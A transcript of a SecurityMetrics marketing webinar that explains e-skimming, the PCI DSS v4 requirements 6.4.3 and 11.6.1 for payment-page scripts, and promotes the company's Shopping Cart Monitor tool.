Watch this to learn the fundamentals of new PCI v4 requirements, such as PCI requirements 6.4.3 and 11.6.1.
In this webinar, SecurityMetrics' Jameson Olsen and David Salazar will discuss the fundamentals of new PCI v4 requirements, including:
Jameson: Hey everyone, welcome to the webinar. Thank you for joining us today. My name is Jameson Olsen. I am the product marketing manager here at SecurityMetrics. Today I'm joined by David Salazar, our director of SMB sales operations. We're going to clarify and simplify some e-commerce security basics for SMB merchants who need to comply with the new PCI requirements for e-com merchants.
We'll start by going over some basic questions. Some merchants have a decent understanding of how their website works, but others, they may have just had an idea for a product they wanted to sell and are using some form of payment platform to make it easy to run their business. You might not know what's going on with these new PCI requirements. We're going to try to outline everything for you as simply as we can today, and make sure that we're all on the same page.
First, what is e-skimming? It's a term that has become more prominent as e-skimming threats have grown year over year recently.
The easiest way to think about it is this: You've heard news stories about an ATM where someone puts a little device that covers the place where you put your card, and it's skimming your information as you use it. E-skimming is that exact same process for your website. They're not hacking into your website to try to get your information; they're trying to use your website as a platform where they can steal your customers' information.
There's also the question of what payment page am I using. Are there different implications based on which one I'm using?
David: It can get complicated knowing what type of e-commerce page you have.
Jameson: Yes. There are several different categories. One is where it's built into your application like Amazon, where everything is handled inside your own application. Probably the most common for merchants like yourselves is having an iframe where you have a third-party payment processor built into your website, maybe Stripe or something like that. The third option is the redirect. PayPal is probably the greatest example, where they click it and it takes them off your site to the third party where the transaction is completed.
David: Sometimes we see customers that have all three options on their web page. It can get confusing, understanding what you need to do to become PCI compliant or what security standards to implement on your website. That's where we come into play. We can help you establish the right standards for your website, your business, and help you keep it secure.
Jameson: Yes, that's a great point. It can be very complicated to figure out. We're happy to help you figure out what type of payment page you're using and what you need to do to be compliant with these new PCI requirements. So, David, can you explain to us what these new requirements are that are impacting e-commerce merchants?
David: Yes, there are a lot of questions recently around 6.4.3 and 11.6.1. We're still learning a lot about it here at SecurityMetrics with our customers and all the websites we see daily, but basically 6.4.3 is asking you to create a log of every script on your payment page. Doing that yourself probably becomes really difficult, especially if you don't have a connection with your web developer or an IT person on staff. We have tools that can help you simplify that and make it really easy for you. Then we have 11.6.1, and this is probably the one we get the most questions about. What does that mean? It's regularly monitoring your page to notice any changes. Is someone tampering with my website? Is someone changing the code on my website?
Jameson: So essentially 6.4.3 is saying you need to know everything that is currently on your payment page in terms of scripts and third-party scripts especially. Then 11.6.1 is saying you need to pay attention to whatever changes from that baseline that you've established in 6.4.3.
David: Yes. Is a new script being injected? Has something new been added? We will always check against the original baseline and monitor for any changes just to give a merchant or business owner a heads up that something's different. Check it out. Let's see how we can help you.
Jameson: How does a site look before and after it has been skimmed by an attacker?
David: Good question. Threat actors are trying to go unnoticed. The website looks the same both before and after. It's really hard to monitor. They've gotten really smart. They go in there, lift information, and leave. No one ever knows. It's really hard to catch that and see those changes happen live. We have our tools like Shopping Cart Inspect or Shopping Cart Monitor that can indicate, "Hey, your website's outdated. It might be vulnerable to some sort of attack or threat, or, hey, your Java Scripts are old. Let's update those and get your website healthy again."
Jameson: Gotcha. It's funny how, it's been decades since the internet and things like a computer virus came around, but I still have this conception that things are going to operate worse, like it's going to be slower, it's going to be impacted. But that's the opposite of the goal of an attacker. Their goal is to let you not even notice that anything has happened, because that means they're in your system longer, collecting more data from your customers.
David: You're right. They don't want to be caught. They're very strategic. They choose good times and go in there, compromise a website, get customer information, and then they can leave with no trace of them ever being on the website. It's very difficult for someone with limited tools to be able to see a threat actor on their website.
Jameson: It's not something you're just going to notice browsing your web page. Let's dive a little bit more into… I mentioned when we were going through the different types of payment pages, I mentioned how iframes are probably the most common for merchants of this size. Are iframes not the gold standard anymore? Is there a problem with using an iframe?
David: No problems using an iframe. No problem using any other method you might want to use on your website. Iframes are still a great tool and one of the gold standards. We've been seeing a lot recently with some of the scanning we've been doing on websites that it might take a little bit more to make us more secure these days. We're seeing a lot of things like old operating systems, missing security patches or updates, old software, open ports, and previous PCI standards. We were really not worried about that in the past, but things evolve. We've been able to scan a few websites with iframes, and we've noticed a couple of these things. I think it's a good time to pay extra attention to iframes and put some really easy tools to work, like our vulnerability scanning or our Shopping Cart Monitor tools, just to triple-check that your iframe is working how it should be and you're keeping your customers' data secure.
Jameson: Because that is the ultimate goal with these requirements. Obviously the PCI Council wants to protect your business, but they also are very concerned with your customers' data. That's why this skimming has become such a concern. What are these threat actors that are coming after small businesses? If I'm a small business, I'm thinking I don't have all the money of a big enterprise or some massive company, why am I a target?
David: Usually, a target because it’s smaller and easier. A lot of times, small to medium businesses are relying on other people to keep their websites secure or their business environment secure. We see ransomware groups, any criminal group, nation-state adversaries, hacktivists; they're always trying to target the small guy because they know there might not be as much security there as a big corporation.
Jameson: You are a target as a small business. If you put effort into trying to protect yourself, you're not big enough for them to go to the trouble of working around the protections you've put in place.
David: Yeah.
Jameson: Okay. A very common question we get, David, at all levels is, "But my platform says I'm compliant. Why do I still need to fulfill these requirements?"
David: That's a great question. They weren't there in the past. They're being established on April 1st of this year. While it wasn't required for compliance previously, it is now. Often we have the ability to customize our websites, add scripts, add sales, add coupons. Some of that stuff we haven't maybe authorized through our vendors or we're using code we found on the internet, and that could cause some vulnerabilities to the website. That's probably not the biggest reason. We're seeing a lot of different types of e-commerce platforms these days, with a lot of different ways to accept payments. We're getting a little more diverse through e-commerce. That's one of the big reasons we want websites to be more secure. We've noticed a big trend in our customers that didn't have an e-commerce solution previously. Now they do, and aDavid: Yeah, that's a great question. They weren't there in the past. They're being established on April 1st of this year. So while it wasn't required for compliance previously, it is now. But yeah, often we have the ability to customize our websites, right? Add scripts, add sales, add coupons. Some of that stuff we haven't maybe authorized through our vendors or we're using code we found on the internet, and that could cause some vulnerabilities to the website. And that's probably not the biggest reason, right? We're seeing a lot of different types of e-commerce platforms these days. With a lot of different ways to accept payments. So I would say we're getting a little more diverse through e-commerce. And that's one of the big reasons we want websites to be more secure. Right. We've noticed a big trend in our customers that didn't have an e-commerce solution previously. Now they do. And a lot of times they don't know how it operates. When it was last updated.
Jameson: It really, it almost feels like this bait and switch, if you want to be an e-commerce and there are tools that make it so easy to launch your e-comm business. But then it comes around to things like PCI compliance, and all of a sudden it's like, wait, I don't, I don't know what I'm supposed to be doing here. Which is why, as you've kind of hinted at already, we create our products from the ground up, thinking about the merchant experience and trying to make it as simple as possible, because we know this is not your background. Like this is not you, you are spending your time doing. And so then all of a sudden expect you to be able to be like an IT director is, is, is a big ask. We're trying to create as low of a barrier of entry for you to be able to be PCI compliant. Can you, can you talk to us about how Shopping Cart Monitor specifically has been designed with that goal in mind to meet these new e-comm requirements?
David: Yeah. So really, if you don't know what you're doing, pretty hard to do this on your own. Right? So we've really… often merchants, they rely on their providers to do some of this work for them. You know. And that could be tough, right? They have millions of customers, thousands of people. They're looking after. So our tool is really easy. All we need is a website, URL or your payment page URL. And then we do the work. With Shopping Cart Monitor, we're looking at, has anything changed with my website? Did I do that? Did somebody else do that? We're looking at common vulnerabilities. We're looking at the scripts that are running, and you know, we're doing that in real time while we're testing that payment page with our expertise. And, you know, our 25 plus years in data security, where we know exactly what we're looking for, to make it as easy as possible for merchants to pull up their report and know what's going on their website.
Jameson: Okay. You mentioned how our solution is all we need is your URL. Like we're, we don't need any sort of code. Can you talk a little bit more about why that is important to making this experience as easy as possible?
David: Yeah. So really excited that we have a cloud based solution. Right. So what that means is you don't need to install a code on your website. You don't need an agent on your website. We need, we, all we need is your URL and we're able to do that with our cloud based solution and basically act like another customer on a website, on your website, and run through a payment page, get the experience we need and be able to show you the results based on what we've seen. So that's pretty cool because it's kind of like a threat actor, right? They're invisible a lot of the times, and so are we. So we can't be detected. And we're trying to keep this process simple for the merchant and for us. And, I think that's something pretty unique that we're able to offer. Right. A lot of times I think when getting a new tool, we're trying to figure it out, all the ins and outs, how to make it work. And often we give up on that because we don't want to use it anymore. We don't want to go through all of that. We want to eliminate all of that and make it as simple as possible for, you know, a small business owner to focus on what they should be doing in running their business.
Jameson: I because, I mean, there are solutions out there for these requirements that are not cloud based, you do have to install code. And I was talking with the product manager here over Shopping Cart Monitor. I'm a huge visuals guy. Like, I love to come up with visual comparisons. And so we were talking about how a code based solution, let's imagine your website is a wall that you’re guarding, and the attackers are trying to sneak in at night. It's like, a code based solution is like a spotlight. And they're like, you can find that, but they can also see the spotlight. So they can, if they're smart enough, they can avoid it because that code is a footprint on your website that they can notice and maybe like circumvent or even disable. But a cloud based solution like, night vision goggles, it's like we can see that, but they have no clue. They can't find us on the website.
David: Yeah, yeah. Very true.
Jameson: So it's a very secure option to meet these compliance requirements and yeah, that visual clicked things into place for me in understanding why cloud-based is so advantageous in our opinion.
David: Yeah. And for me, it's great to have an option where I don't have to do extra work. Right. So I don't need to install something on my website or put in a new line of code. I know that with my URL, SecurityMetrics can run their Shopping Cart Monitor and I get the results that I need. So I think that's great. Right? Threat actors are putting a lot of work into being undetectable, and we're putting a lot of work in being undetectable and be able to locate those when they're happening.
Jameson: Yeah, yeah. And I mean, one other point, I think to bring up with this, just our Shopping Cart Monitor has been built into our overall PCI solution. Like, if you're doing your SAQ through Metrics, your Shopping Cart Monitor. If you add it to the package, it's the same portal. You're not having to go and get a report to then submit or other SAQ offer. It's just one streamlined experience because again, who has the time to deal with getting this report and delivering it over here. All these things, we just want to offer you the one stop shop for SMB PCI compliance.
David: Yeah, I love it because you could log in just how you're used to every single year or, you know, every month when you're checking your vulnerability scans. And you'll see it in our menu Shopping Cart Monitor. You can click on that look at your current report, a previous report, maybe see any work that's outstanding and try to address that, right. And if you're not quite understanding what you need to do or what these things mean, guess what? We have our award winning support department that you could call in basically any time and get some clarification on what that script is. How it's impacting your website. And maybe what you can do to remediate that.
Jameson: I'm glad you brought that up because I was going to say like I can hear a customer maybe saying like, oh, you say it's easy to use. Like I'll find a way to find it complicated, right? But, we have our, our industry leading support team who are available. To walk you through, where you're hung up and make sure that you get compliant without the headaches, we're very proud of our our team that you're talking to a human in seconds, there's no massive phone tree that you have to navigate. Just to get connected to a human. We want to get you back on the path to reaching compliance as fast as possible. David, is there anything else you want to say about Shopping Cart Monitor and why? It's such a great way to meet these requirements?
David: Yeah, I think the ease of use. Right. I know nothing about how to set up, iFrame or, you know, a payment button and if I'm doing that for my business, like, I would want to know how to keep that secure in a very simple manner. Right. So I think, yeah, just the ease of use, how easy it is to understand my reports and the support behind it, really makes me excited about this product and how it can help anybody, right? With a technical background or a non-technical background, Shopping Cart Monitor's made for everyone.
Jameson: Yeah. I think the last thing I'd say about it is just, you know, we've been doing data security for 25 years now, and we have been working on this specific product for a long time. We started in 2018 developing Shopping Cart Monitor, Shopping Cart Inspect. So even though this deadline wasn't coming into play till 2025, like we've been honing our offering to make sure that it is effective, it's secure, but it’s easy to use.
David: Yeah. I mean, like you're saying, we have a lot of experience we've been honing this in since 2018. We've probably seen everything out there. The common vulnerabilities, the rare ones. And I think that's a great way that, that's another reason I'm excited about Shopping Cart Monitor. We're using all the data we've had and previously, and we're applying it to a new product. So that based with our 25 years of experience, I think we're going to see some awesome things and that we're really going to help people keep their e-commerce platform secure.
Jameson: Excellent, David, thank you for joining, this conversation today. We hope we've been able to answer some questions that you've had. And as always, if you have ones we didn't address, reach out. There's links below. You can contact us. We'll also link to the product page to learn more about Shopping Cart Monitor. But, our number one goal is just to make new requirements as painless to address as possible. PCI can get complicated. Our goal is make it as simple as we can for you the merchant so you can focus on what you care about the most. So, send us any questions you have. And thank you for joining us. We're excited to help you be PCI compliant.
.svg)
